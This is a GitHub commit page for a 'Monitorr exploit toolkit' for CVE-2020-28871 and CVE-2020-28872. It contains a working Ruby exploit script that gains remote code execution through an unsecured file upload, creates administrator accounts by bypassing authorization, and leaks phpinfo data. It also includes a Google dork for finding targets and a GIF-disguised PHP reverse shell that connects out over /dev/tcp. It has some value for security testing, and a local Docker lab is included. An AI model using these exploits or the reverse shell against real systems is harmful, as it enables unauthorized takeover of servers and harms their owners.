Skip to content

Commit e81144d

Browse files
committed
1st commit
0 parents  commit e81144d

8 files changed

+308
-0
lines changed

.tool-versions

+1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
ruby 3.0.1

Gemfile

+4
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,4 @@
1+
source 'https://rubygems.org'
2+
3+
gem 'docopt', '>= 0.6.1'
4+
gem 'httpx', '>= 0.14.5'

Gemfile.lock

+19
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,19 @@
1+
GEM
2+
remote: https://rubygems.org/
3+
specs:
4+
docopt (0.6.1)
5+
http-2-next (0.4.1)
6+
httpx (0.14.5)
7+
http-2-next (>= 0.4.1)
8+
timers
9+
timers (4.3.3)
10+
11+
PLATFORMS
12+
x86_64-linux
13+
14+
DEPENDENCIES
15+
docopt (>= 0.6.1)
16+
httpx (>= 0.14.5)
17+
18+
BUNDLED WITH
19+
2.2.15

LICENSE

+21
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,21 @@
1+
MIT License
2+
3+
Copyright (c) 2021 Alexandre ZANNI at SEC-IT
4+
5+
Permission is hereby granted, free of charge, to any person obtaining a copy
6+
of this software and associated documentation files (the "Software"), to deal
7+
in the Software without restriction, including without limitation the rights
8+
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9+
copies of the Software, and to permit persons to whom the Software is
10+
furnished to do so, subject to the following conditions:
11+
12+
The above copyright notice and this permission notice shall be included in all
13+
copies or substantial portions of the Software.
14+
15+
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16+
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17+
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18+
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19+
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20+
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21+
SOFTWARE.

README.md

+124
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,124 @@
1+
# Monitorr exploit toolkit
2+
3+
- **RCE** via _unsecure file upload_ (PHP reverse shell, webshell, etc.)
4+
- **Administrator account creation** via _Authorization bypass_
5+
- **Technical information leakage**: Monitorr version, PHP version, System version & kernel, PHP config, etc.
6+
7+
Exploit for [CVE-2020-28872][CVE-2020-28872] and [CVE-2020-28871].
8+
9+
## Usage
10+
11+
```
12+
$ ruby exploit.rb -h
13+
Monitorr-Exploit
14+
15+
Usage:
16+
exploit.rb upload <url> <file> [--debug]
17+
exploit.rb create <url> <user> <pass> <email> [--debug]
18+
exploit.rb version <url> [--debug]
19+
exploit.rb phpinfo <url> [--debug]
20+
exploit.rb -h | --help
21+
22+
upload: Upload a file (RCE via unrestricted file upload)
23+
version: Try to fetch Monitorr version
24+
phpinfo: Extract main phpinfo() information (Information leakage)
25+
create: Create an administrator account (Authorization bypass)
26+
27+
Options:
28+
<url> Root URL (base path) including HTTP scheme, port and root folder
29+
<file> File to be uploaded
30+
--debug Display arguments
31+
-h, --help Show this screen
32+
33+
Examples:
34+
exploit.rb upload http://example.org revshell.php
35+
exploit.rb create https://example.org:8080/monitorr/ noraj password '[email protected]'
36+
exploit.rb version https://example.org:7000/
37+
```
38+
39+
## Examples
40+
41+
Upload a reverse shell:
42+
43+
```
44+
$ ruby exploit.rb upload http://localhost:7000/ shell.php
45+
[+] File uploaded:
46+
http://localhost:7000//assets/data/usrimg/shell.php
47+
```
48+
49+
Administrator account creation:
50+
51+
```
52+
$ ruby exploit.rb create http://localhost:7000/ noraj20 password '[email protected]'
53+
[+] User created
54+
Username: noraj20
55+
56+
Password: password
57+
```
58+
59+
Get Monitorr version:
60+
61+
```
62+
$ ruby exploit.rb version http://localhost:7000/
63+
1.7.6m
64+
```
65+
66+
Get `phpinfp()`:
67+
68+
```
69+
$ ruby exploit.rb phpinfo http://localhost:7000/
70+
System: Linux f0ded2053dda 5.12.12-zen1-1-zen #1 ZEN SMP PREEMPT Fri, 18 Jun 2021 21:59:24 +0000 x86_64
71+
PHP version: 7.1.17
72+
disable_functions: no value</i>
73+
open_basedir: no value</i>
74+
75+
Full phpinfo() location: http://localhost:7000//assets/php/phpinfo.php
76+
```
77+
78+
## Requirements
79+
80+
- [httpx](https://gitlab.com/honeyryderchuck/httpx)
81+
- [docopt.rb](https://github.com/docopt/docopt.rb)
82+
83+
Example using gem:
84+
85+
```bash
86+
bundle install
87+
# or
88+
gem install httpx docopt
89+
```
90+
91+
## Docker deployment of the vulnerable software
92+
93+
Warning: of course this setup is not suited for production usage!
94+
95+
```
96+
$ sudo docker-compose up
97+
```
98+
99+
Setup / initialize the app at http://127.0.0.1:7000/monitorr/settings.php.
100+
101+
## Limitations
102+
103+
- **Upload**: the uploaded file must have an image magic byte (eg. GIF) in order to match [getimagesize](https://www.php.net/manual/en/function.getimagesize.php) ([code](https://github.com/Monitorr/Monitorr/blob/efff8fd71eac6369fa187e02d86341f35790af35/assets/php/upload.php#L7))
104+
- **Create**: the password used during password creation must be >= 6 characters long (application min. limit)
105+
106+
## References
107+
108+
- Target software: **Monitorr**
109+
- Source: https://github.com/Monitorr/Monitorr/
110+
- Docker: https://hub.docker.com/r/monitorr/monitorr/
111+
- Vulnerable version: 1.7.6m
112+
113+
This is a better re-write & fusion of [EDB-48981][48981] ([CVE-2020-28872][CVE-2020-28872]) and [EDB-48980][48980] ([CVE-2020-28871]) plus extra functionalities.
114+
115+
The upload and admin account creation vulnerabilities were found by [Lyhin's Lab](https://lyhinslab.org/). The phpinfo and Monitorr version leak were found by [Alexandre ZANNI aka noraj](https://pwn.by/noraj/).
116+
117+
Analysis of the original exploit and vulnerability:
118+
119+
- [How White-Box hacking works: Authorization Bypass and Remote Code Execution in Monitorr 1.7.6](https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/)
120+
121+
[48981]:https://www.exploit-db.com/exploits/48981
122+
[48980]:https://www.exploit-db.com/exploits/48980
123+
[CVE-2020-28871]:https://nvd.nist.gov/vuln/detail/CVE-2020-28871
124+
[CVE-2020-28872]:https://nvd.nist.gov/vuln/detail/CVE-2020-28872

docker-compose.yml

+20
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,20 @@
1+
version: '3'
2+
3+
services:
4+
monitorr:
5+
image: monitorr/monitorr:latest # should be 1.7.6m as the docker build as been abandonned
6+
container_name: monitorr-poc
7+
ports:
8+
- '127.0.0.1:7000:80'
9+
volumes:
10+
- type: volume
11+
source: monitorr
12+
target: /app
13+
read_only: false
14+
environment:
15+
- TZ=Europe/Paris
16+
- PGID=1000
17+
- PUID=1000
18+
19+
volumes:
20+
monitorr:

exploit.rb

+118
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,118 @@
1+
#!/usr/bin/env ruby
2+
3+
# Exploit
4+
## Title: Monitorr exploit toolkit
5+
## Google Dorks:
6+
## inurl:/assets/config/_installation/_register.php?action=register
7+
## Author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)
8+
## Author website: https://pwn.by/noraj/
9+
## Date: 2021-06-22
10+
## Vendor Homepage: https://github.com/Monitorr/Monitorr/
11+
## Software Link: https://github.com/Monitorr/Monitorr/archive/refs/tags/1.7.6m.tar.gz
12+
## Version: at least 1.7.6m
13+
## Tested on: OpenNetAdmin 1.7.6.m
14+
15+
require 'pathname'
16+
require 'httpx'
17+
require 'docopt'
18+
19+
doc = <<~DOCOPT
20+
Monitorr-Exploit
21+
22+
Usage:
23+
#{__FILE__} upload <url> <file> [--debug]
24+
#{__FILE__} create <url> <user> <pass> <email> [--debug]
25+
#{__FILE__} version <url> [--debug]
26+
#{__FILE__} phpinfo <url> [--debug]
27+
#{__FILE__} -h | --help
28+
29+
upload: Upload a file (RCE via unrestricted file upload)
30+
version: Try to fetch Monitorr version
31+
phpinfo: Extract main phpinfo() information (Information leakage)
32+
create: Create an administrator account (Authorization bypass)
33+
34+
Options:
35+
<url> Root URL (base path) including HTTP scheme, port and root folder
36+
<file> File to be uploaded
37+
--debug Display arguments
38+
-h, --help Show this screen
39+
40+
Examples:
41+
#{__FILE__} upload http://example.org revshell.php
42+
#{__FILE__} create https://example.org:8080/monitorr/ noraj password '[email protected]'
43+
#{__FILE__} version https://example.org:7000/
44+
DOCOPT
45+
46+
def version(root_url)
47+
vuln_url = "#{root_url}/assets/js/version/version.txt"
48+
49+
HTTPX.get(vuln_url).body.to_s
50+
end
51+
52+
def phpinfo(root_url)
53+
vuln_url = "#{root_url}/assets/php/phpinfo.php"
54+
55+
res = HTTPX.get(vuln_url).body.to_s
56+
sys = res.match(/>System\s?<\/td><td .+>(.+)<\/td>/).captures[0].chomp
57+
phpver = res.match(/>PHP Version\s?<\/td><td .+>(.+)<\/td>/).captures[0].chomp
58+
disablef = res.match(/>disable_functions\s?<\/td><td .+>(.+)<\/td>/).captures[0].chomp
59+
openb = res.match(/>open_basedir\s?<\/td><td .+>(.+)<\/td>/).captures[0].chomp
60+
61+
"System: #{sys}\nPHP version: #{phpver}\ndisable_functions: #{disablef}\nopen_basedir: #{openb}\n\n" \
62+
"Full phpinfo() location: #{vuln_url}"
63+
end
64+
65+
# Password size should be >= 6
66+
def create_user(root_url, username, password, email)
67+
vuln_url = "#{root_url}/assets/config/_installation/_register.php?action=register"
68+
69+
params = {
70+
'user_name' => username,
71+
'user_email' => email,
72+
'user_password_new' => password,
73+
'user_password_repeat' => password,
74+
'register' => 'Register'
75+
}
76+
77+
success = HTTPX.post(vuln_url, form: params).body.to_s.match?(/User credentials have been created successfully/)
78+
79+
return '[-] User not created' unless success
80+
81+
"[+] User created\nUsername: #{username}\nEmail: #{email}\nPassword: #{password}"
82+
end
83+
84+
def upload(root_url, filepath)
85+
vuln_url = "#{root_url}/assets/php/upload.php"
86+
pn = Pathname.new(filepath)
87+
88+
params = {
89+
fileToUpload: {
90+
content_type: 'image/gif',
91+
filename: pn.basename.to_s,
92+
body: pn
93+
}
94+
}
95+
96+
res = HTTPX.plugin(:multipart).post(vuln_url, form: params)
97+
98+
return '[-] File not upload' unless (200..299).include?(res.status)
99+
100+
"[+] File uploaded:\n#{root_url}/assets/data/usrimg/#{pn.basename}"
101+
end
102+
103+
begin
104+
args = Docopt.docopt(doc)
105+
pp args if args['--debug']
106+
107+
if args['version']
108+
puts version(args['<url>'])
109+
elsif args['phpinfo']
110+
puts phpinfo(args['<url>'])
111+
elsif args['create']
112+
puts create_user(args['<url>'], args['<user>'], args['<pass>'], args['<email>'])
113+
elsif args['upload']
114+
puts upload(args['<url>'], args['<file>'])
115+
end
116+
rescue Docopt::Exit => e
117+
puts e.message
118+
end

revshell.php

+1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
GIF89a213213123<?php shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/172.17.0.1/9999 0>&1'");

0 commit comments

Comments
 (0)